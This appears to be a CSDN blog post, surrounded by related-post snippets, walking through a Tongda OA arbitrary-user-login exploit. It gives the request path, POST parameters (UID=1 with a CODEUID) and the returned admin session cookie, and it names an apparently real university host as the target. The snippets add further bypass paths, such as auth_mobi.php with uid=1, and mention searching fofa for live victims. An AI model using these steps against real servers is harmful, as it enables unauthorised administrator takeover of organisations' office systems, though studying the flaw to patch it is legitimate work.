通达OA任意用户登录复现

最新推荐文章于 2024-06-26 16:21:19 发布

凉城木槿

最新推荐文章于 2024-06-26 16:21:19 发布

阅读量1.4k

点赞数

文章标签： java web安全

本文链接：https://blog.csdn.net/qq_52178795/article/details/127432391

版权

1.访问默认管理员后台地址

用户未登录，

弹出如下界面，猜测有通达OA任意用户登录漏洞

2.访问文件https://oaweb.hait.edu.cn//ispirit/login_code.php以获取codeuid。

3.访问文件/logincheck_code.php，同时抓包并修改请求包，将请求方式修改为POST方式，传递CODEUID和用户UID，返回的PHPSESSID即身份缓存。

改包内容：

·将请求方式修改为POST
·增加字段：Content-Type: application/x-www-form-urlencoded
·增加参数：UID=1&CODEUID=_PC{D0FD779B-1E0B-DABE-0CF2-2F7C34438498}&

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

凉城木槿

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
1
评论
通达OA任意用户登录复现

通达OA任意用户登录复现
复制链接

扫一扫

【漏洞复现-通达OA】通达OA前台任意用户登录漏洞

xiaokp7的博客

06-18

2367

通达OA（Office Anywhere网络智能办公系统）是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞，利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码，成功登录系统管理员账户，继而在系统后台上传恶意文件控制网站服务器。

通达 OA 任意用户登录.md

04-12

通达 OA 任意用户登录

1 条评论您还未登录，请先登录后发表或查看评论

记通达OA前台任意用户登录漏洞复现

ergou11的博客

04-23

597

记通达OA前台任意用户登录漏洞复现

漏洞概念_通达OA前台任意用户登录漏洞_详细漏洞知识点

最新发布

程序员六七的博客

06-26

429

本文由东塔网络安全学院学员---张同学投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识，攻击者通过构造恶意请求

通达OA任意用户登录

小石头的博客

05-22

3256

正值HW期间，一些企业公司办公系统可能使用通达OA，可以利用此漏洞。漏洞详情该漏洞类型为任意用户伪造，未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。影响版本通达OA 11.x< 11.5 ，2017 版本手工复现访问/general/login_code.php，burp抓包，获取UID 访问logincheck_code.php，burp抓包，修改post请求，添加UID 修改：访问/general/index.php?is_mod

通达OA_header_inc任意用户登录

Bnessy

10-29

241

【代码】通达OA_header_inc任意用户登录。

通达OA11.7任意用户登录

qq_51950323的博客

05-08

561

通达OA11.7任意用户登录，需要admin用户在线，即可利用该漏洞。

通达OA前台任意用户登录漏洞复现

m0_64769218的博客

09-17

651

通达OA是一套国内常用的办公系统，在V11.X

通达OA前台任意用户登录漏洞.md

09-07

通达OA漏洞合集

TongDaOA-Fake-User:通达OA任意用户登录突破

03-19

通达OA前台任意用户登录拆分违反安全研究，禁止非法利用！使用方法 python3 poc.py -v版本-url url 运行并获取到可用的SESSIONID 替换浏览器Cookie中的SESSIONID立即实现登录为admin 影响范围通达OA2017，V11.X &...

通达OA header身份认证绕过漏洞利用工具

12-25

通达OA header身份认证绕过漏洞利用脚本，可以检测漏洞是否存在并生成可用的cookie

通达OA任意文件上传_文件包含GetShell1

08-03

建议所有使用通达OA系统的用户及时应用补丁以保护系统安全。 10. **安全实践** - 为避免此类漏洞，开发人员应确保对文件上传功能进行严格的安全控制，如验证文件类型、大小和内容，以及限制文件的存储位置。同时，...

通达OA——前台任意用户伪造登录

xunhuanmao的博客

10-08

4234

通达OA是一套使用比较广泛的办公系统，文中所涉及到的利用方式仅供学习使用，切勿用于违法行为。

通达OA任意用户登录漏洞复现

谢公子的博客

01-03

2497

通达OA 前台任意用户登录漏洞漏洞描述通达OA官方于4月17日发布安全更新。在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求，可以直接绕过登录验证逻辑，伪装为系统管理身份登录OA系统。影响范围通达OA2017 (V10.x) 通达OAV11.x < 11.5.200417版本漏洞复现搭建好环境，这里环境使用的是通达OA2017版利用脚本获取cookie python3 tongda-oA.py -v 2017 -ur.

通达OA11.7 漏洞任意用户登录

ShenZ的博客

07-28

1019

1.获取在线用户的cookie IP/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 uid=1为管理员，也可以通过爆破获取其他用户cookie 访问该路径，如果显示relogin则该用户没有登录，没有回显可以得到cookie 2.修改cookie登录抓包找到校验的地方（下包为logincheck.php），修改为得到的cookie POST /logincheck.php HTTP/1.1 Host: ***** User-Agent: M

通达OA任意用户登录漏洞手工复现

yiiiing的博客

08-25

583

前言已经有人发poc了，这里就找个网站手工复现一下影响范围小于11.5版本、2017版本开始首先fofa找到一个目标网站 2017的版的直接点登录抓包，放到repeater中然后修改三个地方更改url/logincheck_code.php、添加UID=1、删除PHPSESSID的值，如果不删除是不会返回一个PHPSESSID的然后随便抓一个登录处的包,修改url，替换session 已经显示管理员了访问/general/index.php ...

通达OA 前台任意用户登录漏洞复现（更新手工获取cookie过程）

thelostworld

05-12

3123

新增内容1:范围今天不是炒冷饭：主要是昨天有个兄弟看了文章后问了一下怎么手动获取cookie，相互交流了一下，觉得还是有必要发一下，这个手工获取cookie的流程。一、漏洞描述通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析，在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求，可以直接绕过登录验证逻辑，伪装为系统管理员身份登录OA系统。二、影响版本通达OA2017、V11.X<V11.5环境搭建：自行镜像环境搭建（后台回复“tongda”获取环境和POC）

某企业通达OA任意登录漏洞复现